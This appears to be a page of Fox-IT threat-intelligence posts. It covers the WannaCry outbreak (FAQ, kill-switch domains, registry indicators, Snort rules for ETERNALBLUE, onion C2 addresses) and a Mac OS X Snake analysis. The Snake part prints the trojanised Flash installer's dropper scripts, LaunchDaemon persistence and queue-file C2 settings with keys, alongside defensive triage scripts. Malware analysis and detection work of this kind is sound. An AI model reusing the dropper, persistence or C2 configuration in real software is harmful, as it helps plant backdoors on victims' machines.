FAQ on the WanaCry ransomware outbreak

Last updated: May 16th 2017

A ransomware variant known as WanaCry/WanaCrypt0r has spread on a massive scale around the world since the 12th of May 2017. For more information about the context with regards to this WanaCry variant, see also our earlier blog. The section below outlines the frequently asked questions and corresponding answers.

Q: What makes this ransomware variant so dangerous?
A: This variant of WanaCry possesses the capability to spread itself as a so-called worm, besides the fact that the ransomware starts encrypting possibly important data on systems. This means that the initially infected system in a network is possibly not the only system that could be impacted, but potentially a large number of systems in the internal network as well. This might result in your business processes coming to a grinding halt.

Q: What was the initial infection vector for the ransomware outbreak?
A: As there is no evidence that the initial infection vector is email, after 72 hours of research by the security community, Fox-IT believes the infection vector is more likely to be vulnerable machines directly exposing SMB to the internet.
At the moment it appears that the only confirmed infection vector is the usage of the ETERNALBLUE SMB exploit.

Q: Which versions of Windows are vulnerable?
A: The SMB exploit works on all versions of Windows which have not yet been patched with MS17-010 (released on the 14th of March 2017), except for Windows 10 and Windows Server 2016, as they are already protected in the default configuration.

Q: What about Windows XP?
A: Microsoft has also released a patch for the unsupported operating systems Windows XP and Windows Server 2003.

Q: Are we safe from WanaCry if we apply the security update to Windows Server 2003?
A: Yes, but the patch KB4012598 applies specifically to this SMB exploit, known as ETERNALBLUE. However, similar NSA exploits, leaked by the Shadow Brokers, for vulnerabilities in Windows Server 2003 and Windows XP were published that lead to remote code execution (RCE). This includes the ERRATICGOPHER exploit for SMBv1 and the ESTEEMAUDIT exploit for RDP, which could be repurposed by malicious actors to create the next ransomworm.

Q: How many endpoints are affected?
A: The sinkhole statistics currently show a total of 160,000+ infections, and this number is still rapidly increasing.

Q: Should we block the ‘kill-switch’ domain on our firewall/proxy?
A: No, you should not. When the malware is capable of reaching the ‘kill-switch’ domain it will not spread any further. Please note that if you block this domain, the malware will in fact continue spreading both internally and externally.

Q: Is the kill switch domain being monitored (counting infections, origin infections)?
A: Yes the sinkhole statistics can be found here.

Q: Do we expect new attacks with the same Modus Operandi (MO)?
A: This is very likely, as this is a lucrative way of earning money for criminals. It is unknown at what moment in time a new attack will start and we do not have indications at this point in time that another campaign is scheduled.

Q: Where can I find the ‘kill switch’ domain?
A: Two ‘kill-switch’ domains have been seen in the wild:

iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Q: Is the malware persistent and will it become active after a reboot of the endpoint?
A: Yes, a registry run-key is added to the registry:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\ = “\tasksche.exe”

Q: How can I check if an endpoint was infected?
A: Though there is no specific script, there are several specific indicators for this ransomware campaign which can be used to detect compromised machines, such as:

HKLM\SOFTWARE\WanaCrypt0r\\wd = “”
HKCU\Control Panel\Desktop\Wallpaper: “\@WanaDecryptor@.bmp”

Q: Is CIFS also vulnerable?
A: CIFS is a dialect of the SMBv1 protocol, and is impacted by this vulnerability.

Q: What impact will disabling SMB v1 have on end users?
A: Please note that this might differ depending on the situation. It is highly recommended to follow the best practices with regards to applying patches, meaning that a thorough impact assessment needs to take place to determine the actual impact of disabling SMBv1. Please note that at least those systems that could solely communicate via SMBv1 will be impacted, for example an old file sharing system.

Q: What are Anti-Virus vendors doing about this?
A: It seems logical that most cybersecurity companies are currently working on finding out all of the details that are related to this attack. It also seems very likely that all cybersecurity vendors are creating prevention and detection capabilities. However, new detection or prevention capabilities can only be applied if updates for these products are downloaded and installed. We would not encourage customers to focus on and wait for these vendors to prevent these kinds of attacks, but rather to focus on installing the Microsoft update (MS17-010) that will prevent the spreading completely.

Q: What if infected laptops are currently offline because people are enjoying their weekends and are returning on monday?
A: It depends on which stage the infection is in on the victim machine. If the machine has already been infected and was halfway through the infection, then it is very likely that the victim machine will continue encrypting files and start spreading when it becomes active again. Therefore we strongly suggest installing the Microsoft update (MS17-010).

Q: What are the chances that a new campaign will be launched with more or improved functionality?
A: Based on our experience it is very likely that the same or other attacker(s) will start launching new campaigns sooner rather than later. We expect that they have learned from the small mistakes they made in the initial version, such as not registering the ‘kill switch’ domain. They could also improve the malware’s functionality to bypass current prevention or detection techniques. Therefore we strongly suggest installing the Microsoft update (MS17-010).

Additionally, the exploitation of this vulnerability will serve as an example for other (cyber) criminals seeking to achieve similar goals, so-called copycats.

Q: Do we have to block the ‘kill switch’ domain in the firewall, or in other security controls like proxy servers?
A: NO! Do not block access to the unique ‘kill switch’ domain as infected clients will then start using the SMB exploit against reachable machines that are vulnerable.

The unique ‘kill-switch’ domain has been registered by a known security researcher. Because of this, the ransomware and the spreading mechanism used in the current malware campaign will not function.
If you block access to this domain, an infected client will start encrypting all of your files and will start spreading to reachable vulnerable devices.

Q: Does the ‘kill-switch’ domain need a valid HTTP connection or is resolving this domain name enough for the malware to stop functioning?
A: Yes, the ‘kill-switch’ domain does need a valid HTTP connection to a webserver listening on port 80. If the malware is not able to make a successful connection on port 80 it will start the ransomware and spreading process.

Q: Is the Linux Samba equivalent also vulnerable?
A: No, the Linux Samba protocol is not vulnerable to this exploit, only the Microsoft SMB protocol, without the latest Microsoft patch (MS17-010) installed, is affected.

Q: There are some reports of WannaCry variants with no ‘kill-switch’ functionality, have you seen this?
A: Yes, Fox-IT has this variant. It seems that someone modified the original malware sample, likely with a common tool like hexedit. There has been another sample where the ‘kill switch’ domain has been completely patched out, resulting in a corrupt binary. Fox-IT is actively monitoring for new versions of the WanaCry ransomware.

Q: Has the ransomware’s implementation of the encryption process been looked at, to see if files are recoverable?
A: The crypto that is used in the malware seems to have been implemented in an unbreakable way. At this point decryption does not seem possible.

Q: Is there anything known about what group is behind this ransomware campaign?
A: Fox-IT, like other security researchers, is investigating connections of WanaCry to other known groups.

Massive outbreak of ransomware variant infects large amounts of computers around the world

Today, May 12th 2017, a ransomware variant known as WanaCry is being spread on a massive scale around the world.
Once a computer is infected it will attempt to infect other machines on the same network using a recently patched vulnerability in the Windows SMB protocol.

Update: We have published an FAQ to answer additional questions about the ransomware outbreak

Prevention

  • Apply Windows update MS17-010
  • Microsoft has also released a patch for Windows XP.
  • Disable the outdated protocol SMBv1
  • Do not allow connections to the RDP or SMB protocol directly from the internet
  • Isolate unpatched or unsupported systems from the internal network
  • Make back-ups and verify that they can be restored

About this campaign

This ransomware campaign is especially dangerous as it spreads itself through the internal network using a recently patched Windows vulnerability.
Once a machine is infected it will scan the entire internal network and infect vulnerable machines.

Machines are not required to be connected to the internet for the encryption process to take place.

The exploit used by this ransomware campaign was leaked by a group known as the ‘Shadow Brokers’ and has now been repurposed by the attackers behind this campaign to infect machines in internal networks. Microsoft has released a patch for this specific vulnerability (MS17-010) on March 14th 2017. Machines that have been patched are not vulnerable to the exploit, but could still be infected through other infection methods such as phishing e-mails.

Impact

After looking at the ransomware’s code Fox-IT noticed that the malware had a hardcoded kill switch which could disable all functionality.
Once the ransomware is running on a victim’s machine it tries to connect to the domain iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com.
If the connection succeeds, the binary exits and will not start encrypting files nor start spreading.

It appears that a fellow security researcher (@MalwareTechBlog) spotted the domain and found out it was not registered by the attackers.
This was a sloppy mistake by the hackers, given the large campaign they were engaged in.
This security researcher registered the domain name, and as soon as it was replying to requests it seems that the kill switch in the malware became active. This means that anyone who has received the actual phishing email but has not opened it yet appears to have been saved.
The domain seems to have been registered at 17:08:04 CEST. This could be one of the possible explanations as to why the hardcoded Bitcoin wallets have not received a large amount of Bitcoins.

The large amount of damage caused today and all international press attention have given everybody a heads up of what to expect.
With the majority of the big organisations starting their weekend, offices are closed. System administrators and security personnel could use this weekend to take prevention, detection and response measures. If everyone comes back to the office on Monday and a new wave of phishing attacks starts without a kill-switch, the damage could be far less than expected at this stage. Though we have learned a lot, the cyber criminals will have as well.

Detection

Snort signatures from Emerging Threats are available for the ETERNALBLUE exploit:

alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray"; flow:to_server,established; content:"|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|"; offset:4; depth:25; content:"|08 ff fe 00 08 41 00 09 00 00 00 10|"; within:12; fast_pattern; content:"|00 00 00 00 00 00 00 10|"; within:8; content:"|00 00 00 10|"; distance:4; within:4; pcre:"/^[a-zA-Z0-9+/]{1000,}/R"; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)

The ransomware itself communicates using the Tor protocol.

Infection vector

One of the confirmed infection vectors is the usage of the ETERNALBLUE exploit directly on machines which have SMB directly exposed to the internet.

This chapter previously stated that we were in the process of verifying if phishing e-mails were also an infection vector for the WanaCry ransomware. Thus far Fox-IT has found no evidence that any phishing e-mails were related to this specific ransomware outbreak, and we have therefore removed the related indicators from this blog.

Command and Control servers

  • cwwnhwhlz52ma.onion
  • gx7ekbenv2riucmf.onion
  • xxlvbrloxvriy2c5.onion
  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion

Bitcoin addresses

Available languages in the ransomware

  • m_bulgarian
  • m_chinese (simplified)
  • m_chinese (traditional)
  • m_croatian
  • m_czech
  • m_danish
  • m_dutch
  • m_english
  • m_filipino
  • m_finnish
  • m_french
  • m_german
  • m_greek
  • m_indonesian
  • m_italian
  • m_japanese
  • m_korean
  • m_latvian
  • m_norwegian
  • m_polish
  • m_portuguese
  • m_romanian
  • m_russian
  • m_slovak
  • m_spanish
  • m_swedish
  • m_turkish
  • m_vietnamese


Danny Heppener, Erik Schamper, Maarten van Dantzig & Frank Groenewegen
Fox-IT Threat Intelligence

Snake: Coming soon in Mac OS X flavour

Summary

Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks [1].

Over the past year Fox-IT has been involved in multiple incident response cases where the Snake framework was used to steal sensitive information. Targets include government institutions, military and large corporates.

Researchers who have previously analyzed compromises where Snake was used have attributed the attacks to Russia [2]. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and its targets more carefully selected.

The framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant was observed [3].

Now, Fox-IT has identified a version of Snake targeting Mac OS X.
As this version contains debug functionalities and was signed on February 21st, 2017 it is likely that the OS X version of Snake is not yet operational.
Fox-IT expects that the attackers using Snake will soon use the Mac OS X variant on targets.

Functionality

For Windows versions the architecture of Snake typically consists of a kernel mode driver designed to hide the presence of several Snake components and to provide low-level access to network communication. Depending on the architecture of a targeted machine either kernel or user mode is used for network communication.

The OS X version of Snake is a port of the Windows version. References to explorer, Internet Explorer and Named Pipes are still present in the binary.

Install Adobe Flash Player.app

The Snake binary comes inside of a ZIP archive named Adobe Flash Player.app.zip which is a backdoored version of Adobe’s Flash Player installer.

The install.sh script is patched with the following lines:

#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/installd.sh" "${TARGET_PATH}/installd.sh"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/installd.sh"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RC

The installd.sh that is invoked contains the following code:

#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
${SCRIPT_DIR}/installdp ${FILE} n
fi

The shell script checks if installdp is already running; if not, it starts it with:

/Library/Scripts/installdp /Library/Scripts/queue#1 n

Persistence

The backdoor is persisted via Apple’s LaunchDaemon service:

$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist
{
"ProgramArguments" => [
0 => "/Library/Scripts/installd.sh"
]
"KeepAlive" => 1
"Label" => "com.apple.update"
"OnDemand" => 1
"POSIXSpawnType" => "Interactive"
}
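The plist above shows the pattern a defender can key on: a file named com.adobe.update.plist whose Label claims to be com.apple.update, a program run from /Library/Scripts, and KeepAlive set so launchd restarts the job. The following triage script is an added example (not Fox-IT's tooling); it embeds the plist from this post re-encoded as XML, plus a constructed benign plist for contrast, and the KNOWN_BAD_PATHS set is taken from the file indicators listed further down in this post.

```python
"""Triage LaunchDaemon plists for the Snake persistence pattern described above."""
import os
import plistlib

# Constructed sample: the com.adobe.update.plist printed by plutil in the post,
# re-encoded as XML so plistlib can load it offline.
SNAKE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.update</string>
  <key>ProgramArguments</key><array><string>/Library/Scripts/installd.sh</string></array>
  <key>KeepAlive</key><true/>
  <key>OnDemand</key><true/>
  <key>POSIXSpawnType</key><string>Interactive</string>
</dict></plist>
"""

# Constructed benign plist (hypothetical vendor daemon) to show the checks do not
# fire on an ordinary, correctly labelled job.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backupd</string>
  <key>Program</key><string>/usr/local/libexec/backupd</string>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

# File indicators from this post's "Indicators of compromise" section.
KNOWN_BAD_PATHS = {
    "/Library/LaunchDaemons/com.adobe.update.plist",
    "/Library/Scripts/installd.sh",
    "/Library/Scripts/queue",
}

# Locations from which a LaunchDaemon should normally not be executing a program.
UNUSUAL_PROGRAM_DIRS = ("/Library/Scripts/", "/tmp/", "/var/tmp/", "/Users/")


def triage_launch_daemon(plist_path: str, plist_bytes: bytes) -> list:
    """Return human-readable findings for one LaunchDaemon plist (empty if clean)."""
    findings = []
    info = plistlib.loads(plist_bytes)          # handles both XML and binary plists
    label = info.get("Label", "")
    args = info.get("ProgramArguments") or []
    program = args[0] if args else info.get("Program")

    if plist_path in KNOWN_BAD_PATHS:
        findings.append(f"plist path '{plist_path}' is a known Snake indicator")

    # By convention the Label equals the file name without ".plist"; the Snake
    # sample is com.adobe.update.plist but labels itself com.apple.update.
    expected_label = os.path.basename(plist_path)[: -len(".plist")]
    if label != expected_label:
        findings.append(f"label '{label}' does not match file name '{expected_label}'")

    # An Apple-looking label in the third-party daemon directory is suspicious on its own.
    if label.startswith("com.apple.") and plist_path.startswith("/Library/LaunchDaemons/"):
        findings.append("label impersonates Apple (com.apple.*) from /Library/LaunchDaemons")

    if program in KNOWN_BAD_PATHS:
        findings.append(f"program '{program}' is a known Snake indicator")
    elif program and program.startswith(UNUSUAL_PROGRAM_DIRS):
        findings.append(f"program '{program}' runs from an unusual location")

    # KeepAlive makes launchd restart the job whenever it exits, so killing the
    # process alone does not remove the backdoor.
    if info.get("KeepAlive"):
        findings.append("KeepAlive is set: launchd restarts the job whenever it exits")
    return findings


def scan_directory(directory: str = "/Library/LaunchDaemons") -> dict:
    """Triage every .plist in a directory; returns {path: findings} for flagged files."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        with open(path, "rb") as fh:
            findings = triage_launch_daemon(path, fh.read())
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for line in triage_launch_daemon("/Library/LaunchDaemons/com.adobe.update.plist", SNAKE_PLIST):
        print("FINDING:", line)
```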

Codesigning details

In order for an application to be run on OS X it has to be signed with a valid certificate issued by Apple, or it would be blocked by Gatekeeper (unless configured otherwise). The following, likely stolen, developer certificate was used to sign the fake Adobe Flash installer which includes the Snake binary:

Executable=Install Adobe Flash Player.app/Install
Identifier=com.addy.InstallAdobeFlash
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=390 flags=0x0(none) hashes=12+3 location=embedded
Hash type=sha1 size=20
CandidateCDHash sha1=ffc1a65f9153c94999212fb8bd7e3950eca035ae
Hash choices=sha1
CDHash=ffc1a65f9153c94999212fb8bd7e3950eca035ae
Signature size=4231
Authority=Developer ID Application: Addy Symonds (EHWBRW848H)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Signed Time=21 Feb 2017 08:55:36
Info.plist entries=22
TeamIdentifier=EHWBRW848H
Sealed Resources version=2 rules=12 files=86
Internal requirements count=1 size=188

Fox-IT has informed Apple’s security team with the request to revoke the certificate.

Debug build

Several strings found throughout the binary indicate that this version is in fact a debug build.

fwrite("Usage: snake_test e[vent]|n[ormal]\n", 0x30uLL, 1uLL, *__stderrp_ptr);
fprintf(v16, "[%s:%s:%d] %s\n", "../../../snake/snake_test.c", "main", 86LL, err);

An interesting observation is the fact that the contents of a temporary file storing command output are converted using KOI8-R encoding, designed to cover the Russian language, which uses the Cyrillic alphabet.

ascii2uni(koi8_str, unicode_str, -1LL, "KOI8-R");

This indicates that the developers tested with Russian command output (encoded using the KOI8-R codepage). On systems where the command output is displayed in another language (and another codepage), text would be incorrectly represented in Cyrillic characters.

Queue file

Builds of Snake generally contain a Queue file. Queue files are used to store Snake’s configuration data, module binaries and queued network packets.

$ python MM_snake_queuefile.py queue
OFFSET STREAM TYPE ID SIZE WRITTEN DATA
0x0000006c 00000001 0002 00000227 00000010 2017-02-10 12:23:22 '\x98\xa7w{\xc7\xcc4\x03-\xdcz\x0b\xc9,`\x1c'
0x000000bc 00000001 0002 00000228 00000010 2017-02-10 12:23:22 '\x90*\xa6\xc5c\x89H\xe2>\x9fS\x1f\xb2\x0b\xf8\xb7'
0x0000010c 00000001 0002 00000229 00000010 2017-02-10 12:23:22 '\x95\x9a\xdf\x82\xf8l\xbe.YR)\xcc\x1a{\xac\x8f'
0x0000015c 00000001 0002 000000df 00000009 2017-02-10 12:23:22 '300000\x00'
0x000001a5 00000001 0002 000000e0 00000009 2017-02-10 12:23:22 '600000\x00'
0x000001ee 00000001 0002 00000190 00000009 2017-02-10 12:23:22 '20000\x00'
0x00000237 00000001 0002 000000e1 00000009 2017-02-10 12:23:22 '4096\x00'
0x00000280 00000001 0002 000000e2 00000009 2017-02-10 12:23:22 '65536\x00'
0x000002c9 00000001 0002 00000143 00000009 2017-02-10 12:23:22 '4096\x00'
0x00000312 00000001 0002 00000144 00000009 2017-02-10 12:23:22 '65536\x00'
0x0000035b 00000001 0002 00000001 00000009 2017-02-10 12:23:22 '1000\x00'
0x000003a4 fffffffd 0002 00000229 00000010 2017-02-10 12:23:22 '\xfb \xb20\x87\xb9m\xa2\x80!\x80\xcc\x1aJbX'
0x000003f4 00000001 0002 00000008 00000011 2017-02-10 12:23:22 '0xfd4488e9\x00'
0x00000445 00000001 0002 00000009 00000009 2017-02-10 12:23:22 '0\x00'
0x0000048e 00000001 0002 00000064 00000009 2017-02-10 12:23:22 '2\x00'
0x000004d7 00000001 0002 00000065 00000021 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\x00'
0x00000538 00000001 0002 00000066 00000031 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\x00'
0x000005a9 00000001 0002 00000070 00000029 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\x00'
0x00000612 00000001 0002 00000071 00000019 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\x00'
0x0000066b 00000001 0002 000000c8 00000009 2017-02-10 12:23:23 '1\x00'
0x000006b4 00000001 0002 000000c9 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x0000071d 00000001 0002 000000d4 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'
0x00000786 00000001 0002 0000012c 00000009 2017-02-10 12:23:23 '1\x00'
0x000007cf 00000001 0002 0000012d 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x00000838 00000001 0002 00000138 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'

The following transport chains are configured in this queue file:

enc.unix//tmp/.gdm-socket read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4
enc.frag.reliable.doms.unix//tmp/.gdm-selinux psk=R@gw1gBsRP!5!yj0
enc.http.tcp/car-service.effers.com:80 psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0
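The three chains above are read off the dump by pairing each record whose data starts with "enc." with the options record next to it. The script below is an added example, not Fox-IT's MM_snake_queuefile.py: it parses the dump lines quoted in this post (embedded as a constructed excerpt), splits each chain into its transport layers and endpoint, parses the options, and extracts the network indicator. The pairing rule (options record id = chain record id + 0x0b) is an assumption inferred from this dump only (0x65/0x70, 0x66/0x71, 0xc9/0xd4, 0x12d/0x138), not documented Snake format knowledge.

```python
"""Recover Snake transport chains from a queue-file dump as printed above."""
import ast
import re
from dataclasses import dataclass, field

# Constructed sample input: an excerpt of the dump quoted in the post (the records
# relevant to transport configuration, plus one binary record so the parser is
# exercised on non-text data).
QUEUE_DUMP = r"""
0x0000006c 00000001 0002 00000227 00000010 2017-02-10 12:23:22 '\x98\xa7w{\xc7\xcc4\x03-\xdcz\x0b\xc9,`\x1c'
0x0000048e 00000001 0002 00000064 00000009 2017-02-10 12:23:22 '2\x00'
0x000004d7 00000001 0002 00000065 00000021 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\x00'
0x00000538 00000001 0002 00000066 00000031 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\x00'
0x000005a9 00000001 0002 00000070 00000029 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\x00'
0x00000612 00000001 0002 00000071 00000019 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\x00'
0x0000066b 00000001 0002 000000c8 00000009 2017-02-10 12:23:23 '1\x00'
0x000006b4 00000001 0002 000000c9 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x0000071d 00000001 0002 000000d4 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'
0x00000786 00000001 0002 0000012c 00000009 2017-02-10 12:23:23 '1\x00'
0x000007cf 00000001 0002 0000012d 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x00000838 00000001 0002 00000138 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'
"""

# OFFSET STREAM TYPE ID SIZE WRITTEN DATA, with DATA printed as a Python string literal.
RECORD_RE = re.compile(
    r"^(0x[0-9a-f]{8}) ([0-9a-f]{8}) ([0-9a-f]{4}) ([0-9a-f]{8}) ([0-9a-f]{8}) "
    r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) ('.*')$"
)

# Assumption inferred from this dump: the options for a chain live in the record
# whose id is the chain record's id plus 0x0b.
OPTIONS_ID_DELTA = 0x0B


@dataclass
class Record:
    offset: int
    stream: int
    rtype: int
    ident: int
    size: int
    written: str
    data: str


@dataclass
class TransportChain:
    layers: list            # outermost first, e.g. ['enc', 'http', 'tcp']
    endpoint: str           # host:port for tcp, a socket path for unix
    options: dict = field(default_factory=dict)
    record_id: int = 0


def parse_records(dump: str) -> list:
    """Turn dump lines into Record objects; lines that do not match are skipped."""
    records = []
    for line in dump.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        data = ast.literal_eval(m.group(7)).rstrip("\x00")   # decode the printed literal
        records.append(Record(*(int(m.group(i), 16) for i in range(1, 6)), m.group(6), data))
    return records


def parse_chain_string(chain: str):
    """'enc.http.tcp/host:80' -> (['enc', 'http', 'tcp'], 'host:80')."""
    layers, _, endpoint = chain.partition("/")
    return layers.split("."), endpoint


def parse_options(opts: str) -> dict:
    """'psk=abc,ustart=1.0' -> {'psk': 'abc', 'ustart': '1.0'}."""
    return dict(item.partition("=")[::2] for item in opts.split(",") if item)


def transport_chains(records: list) -> list:
    by_id = {r.ident: r for r in records if r.stream == 1}
    chains = []
    for rec in records:
        if rec.stream != 1 or not rec.data.startswith("enc."):
            continue
        layers, endpoint = parse_chain_string(rec.data)
        opts_rec = by_id.get(rec.ident + OPTIONS_ID_DELTA)
        options = parse_options(opts_rec.data) if opts_rec else {}
        chains.append(TransportChain(layers, endpoint, options, rec.ident))
    return chains


def unique_chains(chains: list) -> list:
    """Collapse repeated (chain, options) pairs, keeping first-seen order."""
    seen = {}
    for c in chains:
        seen.setdefault((".".join(c.layers), c.endpoint, tuple(sorted(c.options.items()))), c)
    return list(seen.values())


def network_indicators(chains: list) -> set:
    """Hostnames from chains whose innermost transport is TCP (host:port endpoints)."""
    return {c.endpoint.rsplit(":", 1)[0] for c in chains if c.layers[-1] == "tcp"}


if __name__ == "__main__":
    for c in unique_chains(transport_chains(parse_records(QUEUE_DUMP))):
        print(".".join(c.layers) + "/" + c.endpoint, c.options)
```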

Obfuscated strings

Snake binaries contain strings that can be obtained through a snake_name_get() call. These strings are stored as a pair of 0x40 byte blobs that are XOR-ed against each other. In this binary the blobs only contain placeholders that are yet to be replaced by the actual values, which is another indication that this Snake binary is not yet ready to deploy to targets.

00187e20 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|
00187e30 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|
00187e40 35 34 43 41 37 51 55 45 55 45 5f 50 41 54 48 5f |54CA7QUEUE_PATH_|
00187e50 55 4e 49 58 00 00 00 00 00 00 00 00 00 00 00 00 |UNIX............|
00187e60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00187ea0 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|
00187eb0 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|
00187ec0 35 34 43 41 37 4d 45 4a 49 52 4f 44 5f 50 41 54 |54CA7MEJIROD_PAT|
00187ed0 48 5f 44 41 52 57 49 4e 00 00 00 00 00 00 00 00 |H_DARWIN........|
00187ee0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

Indicators of compromise

Files

/Library/LaunchDaemons/com.adobe.update.plist
/Library/Scripts/installd.sh
/Library/Scripts/queue
/var/tmp/.ur-*
/tmp/.gdm-socket
/tmp/.gdm-selinux

SHA256:


Network

The following domain is configured in Snake's queue file for HTTP network transport:

car-service.effers.com

The resolving IP belongs to a Satellite communications provider:

83.229.87.11

Though Snake is typically spread using spear-phishing e-mails and watering hole attacks, Fox-IT has not yet observed this sample being spread in the wild.

Jelle Vergeer, Krijn de Mik, Mitchel Sahertian, Maarten van Dantzig & Yun Zheng Hu
Fox-IT Threat Intelligence


Turkish hacktivists targeting the Netherlands: high noise, low impact

As a result of increased political tensions between The Netherlands and Turkey, a surge in activity from several Turkish hacker groups has been observed by Fox-IT.

Most activities observed thus far appear to be aimed at defacement and disruption of online Dutch infrastructure. Most of the methods and techniques used to achieve this goal are relatively simple and can be executed by an individual with basic knowledge and skills.

Targets of ‘disruption attacks’, in the form of Distributed Denial of Service (DDoS) attacks, appear to have been directly related to the conflict between Turkey and The Netherlands regarding the refusal to let two of Turkey’s ministers visit The Netherlands on March 11th 2017. Some of the targeted websites, such as stemwijzer.nl and kieskompas.nl, had difficulties defending against the DDoS attacks, resulting in downtime just one day before the Dutch elections.

List of Dutch DDoS targets

Defacements were seen across seemingly random Twitter accounts and Dutch websites, carried out by individuals who gathered on publicly accessible hacking forums, where hackers were called to arms using operation names such as Hollanda Operasyonu (translated: Holland Operation).

An example of a WordPress website (iwiweb.nl) defaced using the recently disclosed WordPress content injection vulnerability can be seen in the image below:


Most of these defacement attempts can be stopped by following basic security guidelines, such as regularly updating WordPress & other software installed on the webserver.

The full write-up describes several methods and techniques used by the Turkish hacker groups in order to compromise, deface or disrupt online Dutch infrastructure.

Download the write-up ‘Turkish Hacktivism targeting The Netherlands’

Ziggo ransomware phishing campaign still increasing in size

Introduction

Fox-IT’s Security Operations Center (SOC) has observed fake Ziggo invoice e-mails since October 6th 2016, linking to a ransomware variant known as TorrentLocker.

The group behind TorrentLocker was previously observed using fake Dutch postal service e-mails imitating PostNL, back in 2014. This distribution method of abusing local postal service names was seen in many countries where this threat was active. This was also documented in CERT PL’s report ‘Going Postal’ published last year. After continuous takedowns of the fake invoice domains with the help of Abuse.CH, the group ceased its activities in the Netherlands near the end of 2014, but continued in several other countries around the world.

The switch from using fake track and trace e-mail messages from postal services (from 2014 till 2016), to using fake invoices from a local Dutch ISP known as Ziggo, is an interesting switch in the modus operandi of the group behind TorrentLocker.

